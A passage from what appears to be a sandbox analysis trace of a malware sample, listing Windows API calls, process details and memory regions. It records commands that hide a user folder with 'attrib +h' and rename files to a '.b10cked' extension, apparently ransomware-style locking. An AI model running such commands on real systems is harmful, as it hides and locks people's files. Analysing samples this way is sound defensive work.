0x412c70* [0217.076] FreeEnvironmentStringsW (penv=0x412c70) returned 1 [0217.076] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf0ac | out: lpAttributeList=0x2cf0ac) [0217.076] GetConsoleTitleW (in: lpConsoleTitle=0x2cf490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.076] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.077] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.077] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.077] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.077] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.077] GetConsoleTitleW (in: lpConsoleTitle=0x2cf224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.077] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf0ac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf174 | out: lpAttributeList=0x2cf0ac, lpSize=0x2cf174) returned 1 [0217.077] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf0ac, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf16c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf0ac, lpPreviousValue=0x0) returned 1 [0217.077] GetStartupInfoW (in: lpStartupInfo=0x2cf068 | out: lpStartupInfo=0x2cf068*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, 
lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.077] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.077] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf108*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Searches\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf154 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessInformation=0x2cf154*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc74, dwThreadId=0x6d8)) returned 1 [0217.080] CloseHandle (hObject=0x4c) returned 1 [0217.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.080] GetEnvironmentStringsW () returned 0x413628* [0217.080] FreeEnvironmentStringsW (penv=0x413628) returned 1 [0217.080] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0217.120] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf048 | out: lpExitCode=0x2cf048*=0x0) returned 1 [0217.120] CloseHandle (hObject=0x50) returned 1 [0217.120] _vsnwprintf (in: _Buffer=0x2cf190, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf054 | out: _Buffer="00000000") returned 8 [0217.120] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.120] GetEnvironmentStringsW () returned 0x413628* [0217.121] FreeEnvironmentStringsW (penv=0x413628) returned 1 [0217.121] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.121] GetEnvironmentStringsW () returned 0x413628* 
[0217.121] FreeEnvironmentStringsW (penv=0x413628) returned 1 [0217.121] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf0ac | out: lpAttributeList=0x2cf0ac) [0217.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0217.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0217.121] SetConsoleInputExeNameW () returned 0x1 [0217.121] GetConsoleOutputCP () returned 0x1b5 [0217.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0217.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.122] exit (_Code=0) Process: id = "550" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32187 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32188 start_va = 0x30000 end_va = 0x33fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32189 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32190 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32191 start_va = 0x4a350000 end_va = 0x4a39bfff entry_point = 0x4a350000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32192 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32193 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32194 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32195 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32196 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32217 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32218 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32219 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id 
= 32220 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 32221 start_va = 0x2c0000 end_va = 0x326fff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32222 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32223 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32224 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32225 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32226 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32227 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32228 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32229 start_va = 0x773e0000 
end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32230 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32231 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 32232 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32233 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32234 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32235 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32236 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32237 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 32238 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 32239 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 32240 start_va = 0x1110000 end_va = 0x1272fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001110000" filename = "" Thread: id = 752 os_tid = 0xcb8 [0216.561] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fb94 | out: lpSystemTimeAsFileTime=0x16fb94*(dwLowDateTime=0xb5e18f00, dwHighDateTime=0x1d440a9)) [0216.561] GetCurrentProcessId () returned 0xc0c [0216.561] GetCurrentThreadId () returned 0xcb8 [0216.561] GetTickCount () returned 0x3c937 [0216.561] QueryPerformanceCounter (in: lpPerformanceCount=0x16fb8c | out: lpPerformanceCount=0x16fb8c*=27334993220) returned 1 [0216.561] GetModuleHandleA (lpModuleName=0x0) returned 0x4a350000 [0216.561] __set_app_type (_Type=0x1) [0216.561] __p__fmode () returned 0x76b331f4 [0216.561] __p__commode () returned 0x76b331fc [0216.561] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3721a6) returned 0x0 [0216.562] __getmainargs (in: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c, _DoWildCard=0, _StartInfo=0x4a374140 | out: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c) returned 0 [0216.562] GetCurrentThreadId () returned 0xcb8 [0216.562] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb8) returned 0x38 [0216.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.562] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.562] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb24 | out: phkResult=0x16fb24*=0x0) returned 0x2 [0216.562] VirtualQuery (in: lpAddress=0x16fb5b, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: 
lpAddress=0x70000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.562] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16faf4, dwLength=0x1c | out: lpBuffer=0x16faf4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.562] GetConsoleOutputCP () returned 0x1b5 [0216.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.563] SetConsoleCtrlHandler (HandlerRoutine=0x4a36e72a, Add=1) returned 1 [0216.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.563] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.563] GetEnvironmentStringsW () returned 0x1d0178* [0216.564] FreeEnvironmentStringsW 
(penv=0x1d0178) returned 1 [0216.564] GetEnvironmentStringsW () returned 0x1d0178* [0216.564] FreeEnvironmentStringsW (penv=0x1d0178) returned 1 [0216.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ea94 | out: phkResult=0x16ea94*=0x40) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0xa0, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x0, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x40, 
lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegCloseKey (hKey=0x40) returned 0x0 [0216.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ea94 | out: phkResult=0x16ea94*=0x40) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x40, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x0, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x9, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x9, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x9, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegCloseKey (hKey=0x40) 
returned 0x0 [0216.565] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.565] srand (_Seed=0x5b8863b2) [0216.565] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"" [0216.565] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"" [0216.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.565] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1d18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.565] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.565] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.565] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.565] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.565] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.565] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.565] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.565] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.565] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.565] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.565] 
SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.566] GetEnvironmentStringsW () returned 0x1d22c8* [0216.566] FreeEnvironmentStringsW (penv=0x1d22c8) returned 1 [0216.566] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.566] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.566] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.566] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.566] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.566] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.566] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.566] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.566] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.566] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f860 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.566] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f860, lpFilePart=0x16f85c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f85c*="Desktop") returned 0x18 [0216.566] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.566] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f5dc | out: lpFindFileData=0x16f5dc) returned 0x1d0008 [0216.566] FindClose (in: hFindFile=0x1d0008 | out: hFindFile=0x1d0008) returned 1 [0216.566] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f5dc | out: lpFindFileData=0x16f5dc) returned 0x1d0008 [0216.566] FindClose (in: hFindFile=0x1d0008 | out: hFindFile=0x1d0008) returned 1 [0216.567] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f5dc | out: lpFindFileData=0x16f5dc) returned 0x1d0008 [0216.567] FindClose (in: hFindFile=0x1d0008 | out: hFindFile=0x1d0008) returned 1 [0216.567] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.567] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.567] GetEnvironmentStringsW () returned 0x1d2ae8* [0216.567] FreeEnvironmentStringsW (penv=0x1d2ae8) returned 1 [0216.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.568] GetConsoleOutputCP () returned 0x1b5 [0216.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.568] GetUserDefaultLCID () returned 0x409 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a374950, cchData=8 | out: lpLCData=":") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9a0, cchData=128 | out: lpLCData="0") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9a0, cchData=128 | out: lpLCData="0") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9a0, cchData=128 | out: lpLCData="1") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a374940, cchData=8 | out: lpLCData="/") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a374d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a374d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a374d00, cchData=32 | out: lpLCData="Wed") returned 4 
